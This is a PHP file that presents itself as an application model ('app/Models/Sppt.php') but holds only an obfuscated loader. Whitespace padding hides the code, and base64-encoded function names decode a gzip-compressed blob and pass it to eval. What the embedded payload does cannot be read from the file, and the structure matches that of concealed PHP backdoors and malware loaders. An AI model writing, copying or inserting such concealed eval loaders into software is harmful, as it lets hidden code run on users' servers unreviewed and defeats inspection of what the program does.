<?php 
        $__='printf';$_='Loading app/Models/Sppt.php';
        















































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtWt9vm0gQfo90/0MeKrlVTyngOBGK/BCowUDjxNhmgZeI3XUAs/xICbbxX3+DIU7c3kN6PfV01X4WBhZmdubbbwbJ5vS0xbt7wLBXfI2zp4fe1f60w7AXFMWnm5wuWflpVhRPZ0VUnKosKMuzs7Pe1Unn4vSPE/759Z+TZq1O/0UMvxvpuaJcekiMfX007O2HXlb9Tej0NDzl4ODg+D3RI6kjUNesDN2RPLTJTU1+cOvksm2a0DXbdn3PqeLg4ODg4ODg4OD4v4H/nMHBwcHx+6KHg3J5cX5PlySny94VZ4SDg4ODg+OncPySgRoWlYdERvpK5EmLcOoqG3ckrn3dKcmutNTM2fkzxcT6VsSIVZ5rM3dkR1TXYs+dwLFT4r4m+mgguCM/8vr2mqSMEXFrwHXdQxMB983B7aYQCfifoW1JkVjgVBN8ZzsCf5GXajs41rAubylyKqptJ1iyGf5cWhTmMEasxGPnKUADmNchtq4JHjIjIsEx2q6J6zCc2WSaOQXWbUZWEHc6KWH+naFNNmQ8DX03EiDGhNRK6/u6uFTj69BQlTYuXdvZqbaiulwv52DfXtuQVAa7CWzT0Bw3sW6Z8VkIjWzvN77d5Jahwr1jpcZ9m0H+zFevEz+FmIEjrC/Cu5mCW3/dlg7WRDVKQzXXXlqwQJQ3Hioi2Bd+O76jyHz00dMD0bVHD/YBmsZf1OsYg18PsWY8o05nV3c2wAt1b/b3Ed2pAyQnvtP67PKhr+IVIZfCq5WUogHkzdY4Vr6Zt8ytab6PebnJX+Ifm4yOnRrH1wnVo4LUwkcvBR1Ig4yI9trSJmKblxIFqfb1dlWsgIsdqZNnzmU1bP2RsQMcsZWh+yJOJwLEXBm6HAep89Xtt/aWmnQxl9YhBlWpfdcWSXrerEseuDdPd6nJQEOV358scB3d/VQMY4WBjqEOFv+Qg4P9xW2nRWvexT8WDvoCvssA3YR+5lSgnQJL5yGs3RPUxMBzzQhnN2+eP4D85kirlrNo6iMR6pNFJNWqH899ssJ9hTm6VvkSjfDIjJZIq62RKQZom/iuAZxDzbvmwJrn4aHuwr+JU7Wh/u0Iq9eyAZxg1Pry0PnFbUYLqoe52d/XUmbNhI9Q02VTb4tU61sq3ZGxIrgSSwydJdM9J6B1qEOc0sxD24eWJyOzDjXbboe/hFW76Sn1Enxj3UmpXqyhj8wpMnLQzRpqpoR6yehzrprc8haT8ogTNUyCVC5wnHyT337rrsEc0vlzPhXUbNb4vpuBL5VCzxpkvqSVrtRy8CU95JQdtNFqW36zVqTJGvSyePa9kBzg28gPawL6aPojyZLiNlZUilgJvb3ufF6+5uyZj6a/LV5rcJVfUIkJgRpm8JzYUJUUX+aDnY+2Tb+beS7pcrabPhUGyJ5Dba5JvAlf8bprx0hx6EHf1XGrKfANGvCFPacMekkcgsZl4G9zzGN/wpp+bdabI04s1X7EEqus2XF+nR7312AO6HfP+QygRzZrROTGl9l/0Rdp+axectrH/6oOhcP5w7SAuhoOe1cnJ7/+gT7c7993Zx+ufsT8le1bDN+9TPi+13z3/jxMy99L/G/fSzxeo/dHomiX6MPVX4GS1Po=';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      














































































































































































                                                                                                                                                                                                                     $________;
